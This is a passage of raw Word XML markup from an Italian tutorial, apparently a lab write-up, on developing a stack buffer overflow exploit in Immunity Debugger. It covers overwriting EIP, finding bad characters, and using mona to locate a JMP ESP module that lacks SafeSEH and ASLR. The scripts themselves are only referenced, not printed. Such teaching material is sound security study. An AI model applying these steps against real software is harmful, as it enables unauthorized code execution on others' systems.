        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidRPr="0053382D">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
          </w:rPr>
          <w:t>script2.py</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4892C390" w14:textId="2B54720C" w:rsidR="0053382D" w:rsidRPr="008C1448" w:rsidRDefault="0053382D" w:rsidP="003441B6">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc76047770"/>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.5 </w:t>
      </w:r>
      <w:r w:rsidR="00A91786" w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Sovrascrivere l’EIP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="61A80628" w14:textId="369252C8" w:rsidR="00A91786" w:rsidRDefault="00586467" w:rsidP="0053382D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">Trovato il punto in cui inizia il registro EIP, dobbiamo occuparci di sovrascrivere i 4 byte che lo occupano. </w:t>
      </w:r>
      <w:r w:rsidR="00B3171E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Creiamo un nuovo file chiamato script3.py, diamo i permessi e inseriamo il codice sotto. Notiamo cosa sta succedendo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267E9528" w14:textId="2B5E41D2" w:rsidR="00B3171E" w:rsidRDefault="00B3171E" w:rsidP="00B3171E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CD0CAA4" wp14:editId="04032DCB">
            <wp:extent cx="1729740" cy="289560"/>
            <wp:effectExtent l="0" t="0" r="381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30">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1729740" cy="289560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0FF067" w14:textId="5A7AAF80" w:rsidR="00B3171E" w:rsidRDefault="00B3171E" w:rsidP="00B3171E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Stiamo dicendo al codice di sovrascrivere i primi 2003 byte con il carattere “A” (41414141), mentre i successivi 4 byte, ovvero il registro EIP, con il carattere “B” (42424242). Lanciando lo script, questo è il risultato:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAB9FB0" w14:textId="4353EE6A" w:rsidR="00B3171E" w:rsidRDefault="00B3171E" w:rsidP="00B3171E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31E26810" wp14:editId="5400F215">
            <wp:extent cx="2613660" cy="1264920"/>
            <wp:effectExtent l="0" t="0" r="0"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31">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2613660" cy="1264920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EE29BC" w14:textId="397A6102" w:rsidR="00B3171E" w:rsidRDefault="00B3171E" w:rsidP="00B3171E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Come volevamo, il registro è stato sovrascritto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E84EF6" w14:textId="4B9A1DE6" w:rsidR="00B3171E" w:rsidRPr="00225C29" w:rsidRDefault="00B3171E" w:rsidP="00B3171E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00225C29">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidRPr="00225C29">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>script3.py</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1875EE93" w14:textId="2EAE206F" w:rsidR="00B3171E" w:rsidRPr="008C1448" w:rsidRDefault="00B3171E" w:rsidP="003441B6">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc76047771"/>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">4.6 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trovare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> “bad characters”</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="7A374DD2" w14:textId="56A2F32A" w:rsidR="0053382D" w:rsidRDefault="00225C29" w:rsidP="0053382D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">Per iniziare a generare lo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> che vogliamo, dobbiamo prima eliminare ciò che vengono denominati “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>bad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>characters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>”, ovvero quei caratteri che vanno ad eseguire determinate operazioni in un programma. Dobbiamo quindi scoprire se ce ne sono e, successivamente, eliminarli.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535533C2" w14:textId="77777777" w:rsidR="001C2D23" w:rsidRDefault="001C2D23" w:rsidP="0053382D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">Esempio di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>bad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>characters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4457826D" w14:textId="16DA0D6B" w:rsidR="001C2D23" w:rsidRDefault="001C2D23" w:rsidP="001C2D23">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="767620FE" wp14:editId="747D82BA">
            <wp:extent cx="2186354" cy="1491309"/>
            <wp:effectExtent l="0" t="0" r="444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197336" cy="1498800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46419292" w14:textId="77777777" w:rsidR="001C2D23" w:rsidRDefault="001C2D23">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DBE482" w14:textId="71554CD7" w:rsidR="001C2D23" w:rsidRDefault="009A55A7" w:rsidP="009A55A7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Una volta inseriti nel file script4.py,</w:t>
      </w:r>
      <w:r w:rsidR="00780361">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> e, dati i soliti permessi,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> proviamo a lanciarlo. </w:t>
      </w:r>
      <w:r w:rsidR="00780361">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">Dopo l’ennesimo crash su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00780361">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Immunity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00780361">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">, clicchiamo sul registro ESP col tasto destro e selezioniamo “follow in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00780361">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>dump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00780361">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">”. Ciò che ci verrà fuori sono gli indirizzi e il loro </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00780361">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>dump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00780361">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> esadecimale. Nel nostro caso, questo è ciò che esce fuori: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3316EE10" w14:textId="742ED17C" w:rsidR="00780361" w:rsidRDefault="00780361" w:rsidP="00780361">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09F5DE7C" wp14:editId="5C02D83F">
            <wp:extent cx="2537460" cy="2964180"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2537460" cy="2964180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="432771C4" w14:textId="501E6AFD" w:rsidR="00780361" w:rsidRDefault="00780361" w:rsidP="00780361">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">Come si capisce se ci sono caratteri non validi? Semplicemente compare un carattere diverso al posto di quello previsto, ad esempio “B0” al posto di “1A”. Esempio di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>dump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> con caratteri non validi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FB5290" w14:textId="642CD08E" w:rsidR="00780361" w:rsidRDefault="00780361" w:rsidP="00780361">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77CD2B05" wp14:editId="1BFA160E">
            <wp:extent cx="2584938" cy="3047453"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635"/>
            <wp:docPr id="6" name="Immagine 6" descr="Immagine che contiene testo,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elettronico&#10;&#10;Descrizione generat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2599573" cy="3064706"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C13DCAA" w14:textId="7071B74F" w:rsidR="00780361" w:rsidRDefault="00780361" w:rsidP="00780361">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>In caso di output del genere, bisognerà provvedere a sostituire quei caratteri non validi. Nel nostro caso, va bene così.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55923E6B" w14:textId="590AC7BC" w:rsidR="00780361" w:rsidRDefault="00780361" w:rsidP="00780361">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r w:rsidRPr="00780361">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
          </w:rPr>
          <w:t>script4.py</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D9D5556" w14:textId="77777777" w:rsidR="00780361" w:rsidRDefault="00780361">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C4423C" w14:textId="2480B120" w:rsidR="00780361" w:rsidRPr="008C1448" w:rsidRDefault="00780361" w:rsidP="003441B6">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc76047772"/>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Trovare il modulo corretto</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="09B0A731" w14:textId="192E2A08" w:rsidR="00780361" w:rsidRDefault="009E2AE1" w:rsidP="009E2AE1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">Per far sì che il registro EIP punti al codice malevolo, dentro il registro ESP, dobbiamo fare in modo di saltare nella locazione dell’ESP dove comincia il payload. C’è però un problema, ovvero le protezioni a livello di stack e variazioni di memoria. Un modo per bypassare tutto ciò è trovare un modulo (dll, librerie) di cui il programma fa uso e che non abbia protezioni a livello di memoria come </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>SafeSEH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">, ASLR e così via, ma deve contenere una istruzione assembly del tipo “JUMP ESP”. In questo modo possiamo far puntare il registro EIP a quell’istruzione che ci permette di saltare dentro il payload dell’ESP e iniettare il nostro codice. È qui che entra in gioco “mona </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>module</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">”, un modulo in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> che potremo lanciare da </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Immunity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">. Per farlo, bisognerà scaricare il file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> e inserirlo nella cartella degli script del percorso di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Immunity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> Debugger. Una volta importato, nella shell di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Immunity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">, in basso, lanciamolo: </w:t>
      </w:r>
